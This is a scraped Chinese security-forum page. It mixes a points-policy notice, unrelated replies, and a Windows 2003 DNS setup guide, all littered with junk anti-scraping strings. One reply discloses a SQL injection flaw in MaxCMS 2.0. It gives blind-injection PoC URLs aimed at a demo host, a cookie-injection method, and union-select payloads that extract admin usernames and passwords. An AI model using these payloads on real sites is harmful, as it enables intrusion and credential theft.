最近看过此主题的会员

返回列表 发帖

非安全中国网论坛积分策略调整

现在经济不太景气,为了拉动内需,对论坛积分进行如下:
; }/ i8 a+ A& v# _# T
' n7 Q. t* s6 [. W1 A2 B6 m
1.发布文章得一枚金币。8 ^; O+ p' c& f) U0 c" h
2.下载附件需要一枚金币。
* e5 X; ]6 f; p1 A9 ?( v$ a7 x3.回复主题没有金币。(杜绝下载党,伸手党分子)1 n  Q" I9 t8 r
9 t0 j6 S0 m7 A" \

1 W5 e" [' b) ^% l# k如何获取金币:, [+ o/ t" |& w3 y/ @0 j5 i  s6 c
1.发布原创文章,原创作品。
& ~: r( @) R) j. G, h0 `2.可以在新人区发布一些帮助新人学习的文章。
4 _) J9 w3 F* Q3 e0 i. Z) O3.可以在新人区里面回答新人提出的问题。$ d3 M4 p& p' {( i9 T$ U+ L
4.会员引导的朋友需要注册之后, 会员才会增加贡献值
4 `, D) S1 n0 h$ Q. Z& ~* h* k( J! W只要用户把特定的 url 链接推荐给其他朋友,并引导其他人访问非安全中国网论坛并且注册帐号当然对于,好资源,好原创。我们还是特别支持的!因为有你精彩,才有我们的存在。
9 y( K! d/ H. c0 g不安全所以安全——非安全中国网

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

来过

论坛内容及无效ID将进行一次清理

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

GIF 录像 录制软件。。。实测。。好用。。。

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

马克斯CMS2.0beta (maxcms)SQL注入漏洞
关键字:首页-马克斯CMS2.0 这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。 看代码 incajax.asp dim action : action = getForm("action", "get") response.Charset="gbk" Select  case action     case "newslist" : viewNewsList     case "newscontent" : viewNewsContent     case "digg","tread" : scoreVideo(action)     case "reporterr" : reportErr     case "hit" : updateHit     case else : main End Select terminateAllObjects …… Sub scoreVideo(operType)     dim sql,id,digg,returnValue : id=getForm("id","get")     ‘通过get方式获取id的值     if rCookie("maxcms2_score"&id)="ok" then die "havescore"     if isNul(id) then die "err"     'on error resume next     digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)     ‘ 参数id,没有过滤就带入sql语句进行查询     if err then digg=0 : err.clear()     if not isNum(id) then echoSaveStr "safe" else id=clng(id)     ‘ 查询到digg,注意返回的内容 ……利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告 你提交的数据有非法字符,你的IP【xxxx】已被记录,操作 构造的语句不正确,则返回500 Poc : 正确的: http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97     不正确的: http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99其实随便找个注射工具跑一下就ok了

) R# O  \: H% e7 ~* h另外一处注射 Sub checkPower     dim loginValidate,rsObj : loginValidate = "maxcms2.0"     err.clear     on error resume next     set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&amp;rCookie("m_username")&amp;"'","execute")     loginValidate = md5(getAgent&amp;getIp&amp;rsObj(0))     if err then wCookie "check"&amp;rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"     if rCookie("check"&amp;rCookie("m_username"))<>loginValidate then wCookie "check"&amp;rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"     checkManagerLevel  rsObj(1)     set rsObj=nothing End Sub其中 Function rCookie(cookieName)     rCookie = request.cookies(cookieName) End Function通过伪造cookie中m_username的值可以进行注射 不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数 比如 /admin/admin_ajax.asp 因为sql检测过滤的时候是关键字判断  可是很多重要的关键字后面又加上了个个空格 这样就可以通过寂寞的刺猬发现的用()替代空格的方法绕过 http://localhost/play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin]) http://localhost/play.asp?id=-999+union(select(adminname),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])" e" B% h' P$ _; F) S

. J- c! z% A/ r
' o- B, V' o0 I2 y. d* z6 ~0 S- i2 c* q+ }) L& L' C- k

( Q' i# m2 U' S: t- E+ |  U
5 l% w. ]5 L. F9 o' Q! o9 H* l8 L. s% E( }; ?4 U4 O
& P3 j. n8 z, U( N# l

) J+ L7 R# H0 s+ i; ]: v$ n9 P* C0 [; g( P8 j

( c/ c7 E: \$ @$ j& S, y% [6 j9 d; B- o1 q- [

6 [8 D* p( o+ |  G" z9 ^0 b9 Y' ^* T2 Z3 F7 Y
. q2 R5 l8 G# F( m6 ~5 F
. [5 [, d" h9 f" j8 [

6 ^  p2 m, D( Y! m) k
/ Q' a) t! d, n, L  ~3 |" J
$ B8 a& T1 j# p1 [6 ^8 i公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

手把手教你装Linux系统-设置虚拟机工具
<P align=center>* ^% z6 N$ g/ z4 A" z
3 g/ G( t$ Y7 ^5 ^$ x
http://www.sitedir.com.cn/video/8.swf[/quote]
4 y! n& V, F) n% @( d; ^
) u+ a, g* ~0 N" @3 T( ^& m3 I8 G6 N7 r1 z9 l
. _; Y' v, ?, |. W, d
8 {1 v4 P! o8 b* `+ Q. m  s5 I- m
$ U/ {; H3 `1 U5 w. ^
0 R5 l7 ^/ H- Y! d7 m6 T

/ H( f5 N/ `# b9 V- O2 j1 s
, ]; G4 o1 V* A7 p- b
$ f8 G) m+ [& \& L' F! \: o! q! t7 t$ H7 P2 E% J3 k
  I6 F0 E8 z  T9 G- N) A. C4 ?9 F
: X- g; V, y0 [$ a) U3 k9 S
2 F; {! e- c8 W5 P! H( a

$ l3 j7 x$ l6 z- M$ j1 p. o6 `' |" e
! l) _4 @% q& M& s! @
% i, z7 i) I, g; x) z& w
) v2 B+ x+ r" @, T
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

阿额~~~这些人都疯特勒~~~~~- o0 y9 h- v5 A: Y

' R$ o' w5 }: h8 ^  T/ V8 X: Q( t6 N: i0 B# b0 p; y# _4 |3 N3 s
9 t3 e0 T- a, Z+ x, A  q
* x- i5 K8 Q9 V2 ]

1 H! I) l& M  V* z% \# ^. @! |3 @9 ]1 d
' ?- m. B' d6 F6 ?$ r% B- ?
) y. X, j3 a" m( }

2 p, N0 g3 {1 n: @, }$ X0 O; b: a2 |5 P- H

0 w' [: u3 }4 n8 [! Y; w7 m+ M0 Y7 R3 `1 ^! ~
* C3 S+ P5 B. [  e8 W( E8 F$ ~
8 x8 C6 B2 v5 S" B7 _! L) y

' @' U+ m- _8 k( \; Z0 _9 ~# f3 L# b  d  s- c

5 n7 X7 _% C; m$ r
: L1 R6 {+ N+ n# h; q公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

我想要申请做站长论坛的斑主:www.sitedirsec.com 。。。。。。。。。
5 p9 v$ ?0 w" g% ^5 n4 S1 e$ C: b, l0 x- Z  ]" y0 M

* V  I* U+ ^/ ]
* g# g3 ]9 Y2 g7 i6 G+ w% ]# K8 r$ ?+ W; p
* s/ g- j9 R; @% i+ _/ L0 d
  v! ~3 X. m/ H

, V# C8 I" a) i; E: Z$ `4 B* q5 f2 `6 U

1 \3 v# L2 q5 H6 z2 Z1 V; p, u4 k, k

- p0 \) D3 w  f, X; X3 _
* s" t; T! i5 f2 E; G1 j  h) a& ]+ S4 k* I( k

5 N9 [; X1 k' U! Y( _: T
$ C* E1 |- b' T7 x5 s4 A9 w  }# W* K+ T  T+ d
3 d! I4 n% @( H. y( C  b
) ]( F' W4 X, F6 y+ j7 ]. q
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

DNS服务器的管理与配置基础技巧
计算机在网络上通讯时本来只能识别如“123.123.123.123”之类的数字地址,那么为什么当我们打开浏览器,在地址栏中输入域名dns.qy.com.cn后,就能看到我们所需要的页面呢?
; \! Y5 @0 Z4 w* {4 K; f: H
其实,只是一个IP地址和域名相互“翻译”的过程。前者得建立一个指向相应IP地址的域名映射记录;对于后者,此记录已经建立并且在生效了。而这种“翻译”记录的建立,则需要用到同一种被称之为“DNS服务器”的计算机。

4 |1 f% [0 y% O; |; I
DNS服务器用于TCP/IP网络中,它用来通过用户友好的名称代替难记的IP地址以定位计算机和服务。因此,只要你需要用到某个域名的地方,你都得首先确保已为此名字在DNS服务器中作好了相应的和IP地址的映射工作。
  `. o) @  c# Z# E% y" J
本文将以Windows2003自带的DNS服务为例,谈下如何在局域网中完成这个“翻译系统”的组建工作。
1 B3 K+ @. E# j# i% F( m
一、添加DNS服务
; d; d9 K; k0 `( D$ q. ]& ]" p6 }: f( \
当你安装好Win2003之后,DNS服务并没有被添加进去。依次打开“开始→控制面板→添加/删除程序→添加/删除Windows组件,单击添加或删除Windows组件。在组件列表中,单击网络服务(但不要选中或清除该复选框),然后单击详细信息。单击已选中域名系统(DNS),然后单击确定。
4 U7 P3 |8 ~4 E8 ~; V5 D
单击下一步,得到提示后,将WindowsServer2003CD-ROM插入计算机的驱动器。安装完成时,在完成Windows组件向导页上单击完成。

  _% T2 B1 B" b* H/ e5 h' }+ z
二、配置DNS服务器

" S3 a+ n5 O- [7 F, V) B: q
要使用Microsoft管理控制台(MMC)中的DNS管理单元配置DNS,请按照下列步骤操作:单击开始,指向程序,指向管理工具,然后单击DNS。右击正向搜索区域,然后单击新建区域。当“新建区域向导”启动后,单击下一步。接着将提示您选择区域类型。
1 u; h2 O$ C* ?; m$ y8 `) F# M
区域类型包括:

4 o$ }* z/ r. N3 k$ ~3 A' [8 J
主要区域:创建可以直接在此服务器上更新的区域的副本。此区域信息存储在一个.dns文本文件中。
, b8 Y5 ?: L* c! j5 j9 N
辅助区域:标准辅助区域从它的主DNS服务器复制所有信息。主DNS服务器可以是为区域复制而配置的Active Directory区域、主要区域或辅助区域。辅助DNS服务器上的区域数据无法修改。所有数据都是从主DNS服务器复制而来。

5 c: |2 a2 V' ~' ^- d% S
存根区域:存根区域只包含标识该区域的权威DNS服务器所需的资源记录。这些资源记录包括名称服务器(NS)、起始授权机构(SOA)和可能的glue主机(A)记录。
: J! ]7 G& `+ N: Z! A8 @% H
Active Directory中还有一个用来存储区域的选项。此选项仅在DNS服务器是域控制器时可用。

$ z  R% m3 O0 N: |
新的正向搜索区域必须是主要区域或Active Directory集成的区域,以便它能够接受动态更新。单击主要,然后单击下一步。
' P* j3 y2 I1 J' P$ I
新区域包含该基于Active Directory的域的定位器记录。区域名称必须与基于Active Directory的域的名称相同,或者是该名称的逻辑DNS容器。例如,如果基于Active Directory的域的名称为“support.microsoft.com”,那么有效的区域名称只能是“support.microsoft.com”,接受新区域文件的默认名称。
+ R! z7 F9 ]5 [) \
如何移除根DNS区域
+ R, A' b5 y" f4 V+ W8 v8 u
运行WindowsServer2003的DNS服务器在它的名称解析过程中遵循特定的步骤。首先查询它的高速缓存,然后检查它的区域记录,接下来将请求发送到转发器,最后使用根服务器尝试解析。

4 D6 x3 I3 y2 A; X/ j3 P
默认情况下,Microsoft DNS服务器连接到Internet以便用根提示进一步处理DNS请求。当使用Dcpromo工具将服务器提升为域控制器时,域控制器需要DNS。如果在提升过程中安装DNS,会创建一个根区域。这个根区域向您的DNS服务器表明它是一个根Internet服务器。因此,您的DNS服务器在名称解析过程中并不使用转发器或根提示。

1 D! z# L; \" ^5 n, Z
这时可以选择将根DNS区域移除。单击开始,指向管理工具,然后单击DNS。展开Server Name,其中Serve Name是服务器的名称,单击属性,然后展开正向搜索区域。右击"."区域,然后单击删除即可。
3 k. {9 ]' x% D! j
如何配置转发器
0 ~: v' P- b. x% m" g
WindowsServer2003可以充分利用DNS转发器。该功能将DNS请求转发到外部服务器。如果DNS服务器无法在其区域中找到资源记录,可以将请求发送给另一台DNS服务器,以进一步尝试解析。一种常见情况是配置到您的ISP的DNS服务器的转发器。

, k4 r  g& R) S) N6 d
单击开始,指向管理工具,然后单击DNS。右击Server Name,其中Server Name是服务器的名称,然后单击转发器选项卡。单击DNS域列表中的一个DNS域。或者单击新建,在DNS域框中键入希望转发查询的DNS域的名称,然后单击确定。

* h1 p7 V- @% }4 x
在所选域的转发器IP地址框中,键入希望转发到的第一个DNS服务器的IP地址,然后单击添加。
. x# Z7 s4 x% `# t* y9 y
DNS是Internet上使用的核心名称解析工具,负责主机名称和Internet地址之间的解析。进行必要的合理的设置,会使我们的工作达到事半功倍的效果。

- |, C: L, a. N" I8 R( A* Z
- D- v8 g/ @1 L2 r5 M, B2 |: s* ^

- J6 B( ?5 @/ Q, }: G+ _" \. K+ ?1 k  P# [! M0 E/ @  u

  R- q* t4 t/ d# y3 g$ ~7 J! T7 p( k
. ~: k0 L  [' l' Q+ q

6 v/ q5 u) V6 M2 I  A% |( S2 N9 r( @' Y2 ]- i
/ T# a) K  C) r( M  S+ C

+ h9 V0 Y1 P1 U& v: p* \& O& f$ q
' I+ ~8 I% x! B0 w6 A* W5 t4 \# Y+ |
2 l  d7 `1 r1 Z9 b0 Z( l

* q! C4 t0 l; T
/ ~5 w8 L6 f0 T3 @* V
2 Y' |& ~: e7 S: x' E& X
6 \% p" |( y, y& E2 P公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表